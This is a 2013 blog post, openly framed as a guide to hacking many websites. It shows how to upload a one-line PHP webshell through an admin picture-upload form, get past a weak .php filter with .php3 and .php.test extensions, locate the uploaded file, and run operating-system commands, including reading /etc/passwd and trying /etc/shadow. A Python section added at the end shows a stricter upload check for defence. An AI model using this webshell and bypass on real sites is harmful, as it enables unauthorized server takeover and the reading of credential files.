
Saturday, May 4, 2013

How To Hack A Lot Of Websites In A Bulk - By Uploading a shell and Executing codes .

Once access to the administration page is obtained, the next goal is to find a way to
execute commands on the operating system.
The application has a file upload function that lets a user upload a picture. We can
use this functionality to try to upload a PHP script instead. Once it is stored on the
server, this PHP script gives us a way to run PHP code and operating system commands.
First we need to create a PHP script to run commands. Below is the source code of a
simple and minimal webshell:
<?php
system($_GET['cmd']);
?>
This script takes the content of the parameter cmd and executes it. It needs to be
saved as a file with the extension .php; for example, shell.php can be used as the
filename.
We can now use the upload functionality available at the page
http://vulnerable/admin/new.php and try to upload this script.
We can see that the script has not been uploaded correctly on the server: the
application prevents files with the extension .php from being uploaded. We can however try:
.php3, which bypasses a simple filter on .php;
.php.test, which bypasses a simple filter on .php while Apache still treats the file as
PHP, since in this configuration it has no handler for .test.
Now we need to find where the PHP script that handles the upload stores the file on the
web server, and ensure that the file is directly reachable by web clients. We can
visit the web page of the newly uploaded image to see where the <img> tag is
pointing to:
<div class="content">
<h2 class="title">Last picture: Test shell</h2>
<div class="inner" align="center">
<p>
<img src="admin/uploads/shell.php3" alt="Test shell" /> </p>
</div>
</div>
You can now access the page at the following address and start running commands
using the cmd parameter. For example, accessing
http://vulnerable/admin/uploads/shell.php3?cmd=uname runs the command uname on
the operating system and returns the current kernel name (Linux).
Other commands can be used to retrieve more information:
cat /etc/passwd to get a full list of the system's users;
uname -a to get the version of the current kernel;
ls to get the content of the current directory;
...
The webshell has the same privileges as the web server process running the PHP script:
you will not, for example, be able to retrieve the content of the file /etc/shadow, since the
web server does not have access to this file (you should still try, in case an
administrator made a mistake and changed the permissions on this file).
Each command runs in a brand new context, independently of the previous command,
so you cannot get the contents of the /etc/ directory by running cd /etc and then
ls: the second command runs in a new context. To list the contents of the
directory /etc/, run ls /etc instead.
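The extension filter above fails because it rejects only names that end in exactly .php. As an added example (not part of the original post), the following Python models that weak check beside a stricter one that allowlists image extensions on every dotted segment of the name and sniffs the file's leading bytes, so the server, not the client, picks the stored name and extension. The function names, the magic-byte table and the Apache FilesMatch remark are assumptions, not taken from the post.

```python
import os
import secrets
from typing import Optional

# Allowlist of image extensions; every dotted segment of the name must be one of these.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Magic bytes of the allowed image types (constructed lookup; deliberately small).
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def naive_filter(filename: str) -> bool:
    """The weak check from the post: only a name ending in '.php' is rejected,
    so 'shell.php3' and 'shell.php.test' both pass."""
    return not filename.lower().endswith(".php")


def strict_filter(filename: str) -> bool:
    """Allowlist check on every extension segment of the base name.
    'shell.php3' fails (php3 not allowed) and 'shell.php.test' fails (neither php
    nor test is allowed), which also defeats Apache matching a handler on an
    intermediate extension."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) < 2 or parts[0] == "":
        return False
    return all(part in ALLOWED_EXTENSIONS for part in parts[1:])


def sniff_image(data: bytes) -> Optional[str]:
    """Return the image type implied by the leading bytes, or None."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def safe_upload_name(filename: str, data: bytes) -> Optional[str]:
    """Decide whether an upload is accepted and, if so, return the name the
    server stores it under: a random token plus the *sniffed* extension, so the
    client chooses neither the name nor the extension. Pair this with a server
    rule that hands only the final extension to PHP (e.g. Apache
    <FilesMatch "\\.php$">); that deployment detail is an assumption."""
    if not strict_filter(filename):
        return None
    kind = sniff_image(data)
    if kind is None:
        return None
    return f"{secrets.token_hex(16)}.{kind}"
```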
ThanQ for reading!
